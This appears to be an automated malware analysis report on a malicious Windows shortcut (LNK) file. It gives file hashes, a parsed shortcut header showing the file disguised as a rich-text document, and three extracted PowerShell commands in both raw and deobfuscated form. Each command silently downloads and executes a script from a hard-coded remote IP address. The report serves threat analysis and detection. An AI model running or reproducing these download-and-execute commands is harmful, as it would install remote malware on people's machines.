Characteristics
Hash
Hash Value
MD5
8a6d715d998459360a3a230711bef80e
Sha1
2ec60b598afbf860f633bec88e906e3bd71b9929
Sha256
a1e2620cff9e1612e0f50d13b3d9f0295079cd4e7b6b8a338a3a39aa8fd2c7c2
Sha384
87797783649255c05e8779c8d3c46e6bc5b8b1d8a048993629a2da829ffb29f46576f269505269e9cd9af4b7243e724a
Sha512
69e107f4b4999a20262831cfd9dc2e9ae095037380acd971b78c5c6c649ec83ce892a506d6f8d1b154e7c4815d59a65fbc43c1b2fbd93c82ff58f621824f8495
SSDeep
96:Yc3+udf7i4A268YY+/+udf7i438Vhka+udf7i468F3G+5kH:Yo+udf7i4uxL+udf7i43Mb+udf7i46o2
TLSH
09A4E024A3F51F08F1B7AA7E9D7A2B5888727B1CDB21D74C0214A0891C71B54E835F3B
File Structure
Artefacts
Name
Value
LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/tracekitten.ps1') })))

LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/ospreybonfire.ps1') })))

LNK: Command Execution

powershell.exe -w Hidden .([ScriptBlock]::Create((New-Object Net.WebClient | ForEach-Object { $_.Headers.Add('User-Agent','UA WindowsPowerShell'); $_.DownloadString('http://146.185.239.63/k4s/violabanner.ps1') })))

Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/ospreybonfire.ps1"))))

Parsed LNK shortcut (header fields and deobfuscated PowerShell arguments)

shortcut: headersize: 76 76 linkclsid: "00021401-0000-0000-c000-000000000046" linkflags: @("HasLinkTargetIDList", "HasName", "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode", "ForceNoLinkInfo") fileattributes: 0 creationtime: "11/17/2025" "10:08:21" "PM" accesstime: "11/17/2025" "10:08:21" "PM" writetime: "11/17/2025" "10:08:21" "PM" filesize: 0 0 iconindex: 85 showcommand: "SW_SHOWMINNOACTIVE" hotkey: 0 linktargetidlist: idlistsize: 395 395 displayname: "powershell" path: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" stringdata: namestring: "Rich" "????xt" "D??cument" workingdir: "%LOCALAPPDATA%" commandlinearguments: -w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/ospreybonfire.ps1")))) iconlocation: "imageres.dll"

Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/tracekitten.ps1"))))

Deobfuscated PowerShell

-w "Hidden" "." ([ScriptBlock]::"Create"((New-Object "Net.WebClient" | ForEach-Object $_."Headers"."Add"("User-Agent", "UA WindowsPowerShell") $_."DownloadString"("http://146.185.239.63/k4s/violabanner.ps1"))))

8a6d715d998459360a3a230711bef80e (467.05 KB)